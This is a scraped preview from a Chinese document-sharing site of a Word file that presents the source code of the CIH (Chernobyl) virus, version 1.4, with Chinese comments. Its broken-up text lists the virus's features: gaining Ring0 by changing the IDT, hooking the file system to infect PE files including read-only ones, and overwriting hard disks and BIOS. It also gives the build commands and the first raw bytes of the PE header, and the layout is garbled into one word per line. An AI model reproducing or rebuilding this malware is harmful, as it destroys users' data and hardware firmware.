CIH病毒4版本之中文注释文档格式.docx
《CIH病毒4版本之中文注释文档格式.docx》由会员分享,可在线阅读,更多相关《CIH病毒4版本之中文注释文档格式.docx(37页珍藏版)》请在冰豆网上搜索。
of
TATUNG
in
Taiwan
Create
Date
04/26/1998
Now
Version
1.4
Modification
Time
05/31/1998
Turbo
Assembler
4.0
tasm
/m
cih
Link
3.01
tlink
/3
/t
cih,
cih.exe
编译连接方法
使用的是TurboAssembler
*==========================================================================*
可在Borland
C++
3.1中找到
History
v1.0
1.
the
Program.
2.
Modifies
IDT
to
Get
Ring0
Privilege.
3.
Code
doesn'
t
Reload
into
System.
4.
Call
IFSMgr_InstallFileSystemApiHook
Hook
File
5.
Entry
Point
IFSMgr_InstallFileSystemApiHook.
6.
When
System
Opens
Existing
PE
File,
will
be
Infected,
and
Reinfected.
7.
It
is
also
even
Read-Only.
8.
don'
Changed.
9.
My
Uses
IFSMgr_Ring0_FileIO,
it
not
Previous
FileSystemApiHook,
Function
that
IFS
Manager
Would
Normally
Implement
this
Particular
I/O
Request.
10.
Size
only
656
Bytes.
v1.1
Especially,
Infected
Increase
it'
s
Size...
^__^
05/15/1998
Modify
Structured
Exception
Handing.
Error
Occurs,
Our
OS
should
Windows
NT.
So
Cute
Continue
Run,
Jmup
Original
Application
Run.
Use
Better
Algorithm,
Reduce
Size.
"
Basic"
796
v1.2
Kill
All
HardDisk,
BIOS...
Super...
Killer...
Bug
05/21/1998
1003
v1.3
WinZip
Self-Extractor
Occurs
Error.
Open
==>
Don'
Infect
it.
05/24/1998
1010
v1.4
Full
Change
Killing
Computers.
Copyright.
1019
.586P
586保护模式汇编
Executable
File(Don'
Section)
OriginalAppEXE
SEGMENT
FileHeader:
编译连接后的PE格式可执行档档头
db
04dh,
05ah,
090h,
000h,
003h,
000h
004h,
0ffh,
0b8h,
040h,
080h,
00eh,
01fh,
0bah,
0b4h,
009h,
0cdh
021h,
001h,
04ch,
0cdh,
054h,
068h
069h,
073h,
020h,
070h,
072h,
06fh,
067h,
072h
061h,
06dh,
063h,
06eh,
06fh
074h,
062h,
065h,
075h,
06eh
044h,
04fh,
053h,
020h
064h,
02eh,
00dh,
00ah
024h,
050h,
045h,
0f1h,
068h,
035h,
0e0h,
00fh,
001h
00bh,
005h,
010h,
002h,
078h,
060h
000
升级会员 